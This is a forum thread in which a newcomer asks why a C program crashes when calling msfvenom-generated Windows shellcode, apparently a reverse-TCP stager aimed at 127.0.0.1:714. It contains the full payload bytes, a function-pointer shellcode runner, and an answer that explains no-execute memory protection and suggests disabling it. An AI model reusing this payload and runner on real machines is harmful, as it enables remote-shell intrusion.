Survivor - 3 months ago
C Question

C shellcode execution issue

Sorry if I make mistakes, it's my first post here. And English is not my native language, but I'll do my best.

So I recently got interested in Metasploit, and I was trying to execute some shellcode from C code.

So I've generated a shellcode with msfvenom for LHOST = 127.0.0.1 and LPORT = 714 (so if you want to run the shellcode, no problem because localhost) and selected C format for output.

Then I found this : http://disbauxes.upc.es/code/two-basic-ways-to-run-and-test-shellcode/
and this : http://www.sevagas.com/?Hide-meterpreter-shellcode-in-executable

So what I did :

#include <stdio.h>
char code[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\x7f\x00\x00\x01\x68\x02"
"\x00\x02\xca\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
"\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3";

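int main(int argc, char **argv)
{
    /* Pointer to a function returning int, aimed at the byte array. */
    int (*func)();
    func = (int (*)()) code;
    /* Jump into the array; this is the call that crashes. */
    (int)(*func)();

    return 0;
}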


Compiled it, launched it.. And crash....
"Exception non gérée à 0x00338000 dans Shellcode.exe : 0xC0000005 : Violation d'accès lors de l'exécution à l'emplacement 0x00338000."

The crash is happening here : "(int)(*func) ();"

As I don't really understand what the program is trying to do (I'm quite new to C), I don't know where the problem comes from. Is it my shellcode or is it the way it is called?

And does someone have some documentation about executing shellcode in C/C++?

Thanks all for your help,

Survivor

md5
Answer

The bytes represent machine instructions. On ordinary machines, the memory is broken into different memory segments, and code will typically go in a data segment. The call:

int(*func) ();
func = (int(*) ()) code;
(int)(*func) ();

tries to execute the code contained in these bytes.

However, modern operating systems usually provide, by default, protection against executing code located in memory segments not designed for code execution (see here for example). You have to configure your compiler to disable it.
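The protection described in the answer can be observed directly. The following is an added example, not code from the question or the answer. It assumes a Linux system with /proc/self/maps rather than the Windows build in the question, and the names sample_bytes, mapping_perms and is_executable are hypothetical. It reports whether the page holding a global byte array is executable, compared with the page holding a compiled function.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Constructed stand-in for the question's code[] array: a few harmless
   bytes, stored in the writable data segment like any initialized global. */
char sample_bytes[] = "\x90\x90\x90\x90";

/* Find the mapping that contains addr in /proc/self/maps and copy its
   permission string (e.g. "rw-p") into perms. Returns 0 on success. */
int mapping_perms(const void *addr, char perms[5])
{
    FILE *maps = fopen("/proc/self/maps", "r");
    char line[512];
    uintptr_t target = (uintptr_t)addr;
    int found = -1;

    if (maps == NULL)
        return -1;
    while (found != 0 && fgets(line, sizeof line, maps) != NULL) {
        unsigned long start, end;
        char p[5];
        if (sscanf(line, "%lx-%lx %4s", &start, &end, p) == 3 &&
            target >= start && target < end) {
            memcpy(perms, p, 5);
            found = 0;
        }
    }
    fclose(maps);
    return found;
}

/* 1 if the page holding addr is executable, 0 if not, -1 if unknown. */
int is_executable(const void *addr)
{
    char perms[5];
    if (mapping_perms(addr, perms) != 0)
        return -1;
    return perms[2] == 'x';
}

int main(void)
{
    printf("data array executable: %d\n", is_executable(sample_bytes));
    printf("function executable:   %d\n",
           is_executable((void *)(uintptr_t)mapping_perms));
    return 0;
}
```

A result of 0 for the array and 1 for the function is the situation behind the 0xC0000005 execution fault in the question: the bytes sit in memory that is readable and writable but not executable.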